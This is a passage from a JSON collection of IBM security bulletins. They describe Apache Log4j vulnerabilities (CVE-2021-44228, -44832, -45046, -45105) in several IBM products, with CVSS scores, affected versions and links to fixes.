"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T01:45:15", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool/OMNIbus Common Integration Libraries is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T01:45:15", "id": "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "href": "https://www.ibm.com/support/pages/node/6551310", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:19", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther+software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther+software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:09:05", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling External Authentication Server (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:09:05", "id": "4AF3F2925FA2FAC4247303F748E1EABFA2DFEF4045F7C3DA1E06B8C833F40639", "href": "https://www.ibm.com/support/pages/node/6538684", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:24", "description": "## Summary\n\nApache Log4j is used by IBM Netcool Agile Service Manager as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Netcool Agile Service Manager| 1.1 - 1.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now. **\n\nFor IBM Netcool Agile Service Manager v1.1 - v1.1.9, upgrade to v1.1.10. \nFor v1.1.10, refresh to the packages that were uploaded on 14th January 2022.\n\nGo to [Download IBM Netcool Agile Service Manager V1.1.10 on premise](<https://www.ibm.com/support/pages/node/589201> \"Download IBM Netcool Agile Service Manager V1.1.10 on premise\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n13 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9LQB\",\"label\":\"Netcool Agile Service Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.1.10\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-21T17:03:35", "type": "ibm", "title": "Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-21T17:03:35", "id": "30495EE9B3C48AB51AC589D2A5956D977474A3BCCB9A67B54801DEE7685C5573", "href": "https://www.ibm.com/support/pages/node/6549838", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:33", "description": "## Summary\n\nApache Log4j is used by IBM Spectrum Symphony for generating logs in some of its components such as ELK, GUI and so on. This bulletin provides interim fixes which include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Symphony.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.2, 7.2.0.2 \nIBM Spectrum Symphony| 7.2.1, 7.2.1.1 \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| \n\n7.2/7.2.0.2\n\n| \n\nP104544\n\nP104504\n\nP104509\n\nP104522\n\nP104521\n\n| \n\n[sym-7.2-build600980](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2-build600980&includeSupersedes=0> \"sym-7.2-build600980\" )\n\n[sym-7.2.0.2-build600934](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600934&includeSupersedes=0> \"sym-7.2.0.2-build600934\" )\n\n[sym-7.2.0.2-build600939](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600939&includeSupersedes=0> \"sym-7.2.0.2-build600939\" )\n\n[sym-7.2.0.2-build600941](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600941&includeSupersedes=0> \"sym-7.2.0.2-build600941\" )\n\n[sym-7.2.0.2-build600944](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600944&includeSupersedes=0> \"sym-7.2.0.2-build600944\" ) \n \nIBM Spectrum Symphony| 7.2.1/7.2.1.1| \n\nP104505\n\nP104510\n\nP104524\n\nP104523\n\n| \n\n[sym-7.2.1-build600935](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600935&includeSupersedes=0> \"sym-7.2.1-build600935\" )\n\n[sym-7.2.1-build600940](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600940&includeSupersedes=0> \"sym-7.2.1-build600940\" )\n\n[sym-7.2.1-build600942](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600942&includeSupersedes=0> \"sym-7.2.1-build600942\" )\n\n[sym-7.2.1-build600945](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600945&includeSupersedes=0> \"sym-7.2.1-build600945\" ) \n \nIBM Spectrum Symphony| 7.3| \n\nP104506\n\nP104508\n\n| \n\n[sym-7.3-build600936](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600936&includeSupersedes=0> \"sym-7.3-build600936\" )\n\n[sym-7.3-build600943](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600943&includeSupersedes=0> \"sym-7.3-build600943\" ) \n \nIBM Spectrum Symphony| 7.3.1| P104507| [sym-7.3.1-build600937](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build600937&includeSupersedes=0> \"sym-7.3.1-build600937\" ) \nIBM Spectrum Symphony| 7.3.2| P104511| [sym-7.3.2-build600938](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build600938&includeSupersedes=0> \"sym-7.3.2-build600938\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes **section.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZUMP\",\"label\":\"IBM Spectrum Symphony\"},\"Component\":\"GUI\\/PERF\\/ELK\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.3.2;7.3.1;7.3;7.2.1;7.2.0.2\",\"Edition\":\"7.3.2;7.3.1;7.3;7.2.1;7.2.0.2\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T02:51:34", "type": "ibm", "title": "Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Symphony is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T02:51:34", "id": "5662007982BBB6B88D91C6C7393CC2022D9415D2290FD0DA76D55E99204FFF35", "href": "https://www.ibm.com/support/pages/node/6539410", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:37:58", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which is used by IBM Engineering Systems Design Rhapsody (RDM) components; Knowledge Center and Test Conductor for logging . The fix includes upgrade to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Systems Design Rhapsody| 9.0, 9.0.1 \nRational Rhapsody| 8.4 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nFor **IBM Engineering Systems Design Rhapsody** follow the instructions to apply the following fixes:\n\n1\\. The Knowledge Center component for a locally installed help server (KCCI) that is (optionally) installed and configured for the following products: IBM Engineering Systems Design Rhapsody Versions** 8.4, 9.0, 9.0.1.** Select the appropriate version link below and follow the instructions from the support page.\n\n * [8.4](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"8.4\" )\n * [9.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0\" )\n * [9.0.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0.1\" )\n\n2\\. Next, For IBM Engineering Systems Design Rhapsody Versions **9.0, 9.0.1** you will need to also update the **Test Conductor** component. Click the link below for the affected version and follow the instructions from the support page.\n\n * [9.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Rhapsody-9.0-TestConductorAdapterForETM-log4j-patch&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0\" )\n * [9.0.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Rhapsody-9.0.1-TestConductorAdapterForETM-log4j-patch&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0.1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n04 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSB2MU\",\"label\":\"IBM Engineering Systems Design Rhapsody\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"9.0,9.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7P9W\",\"label\":\"Rational Rhapsody\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.4\",\"Edition\":\"\",\"Line of 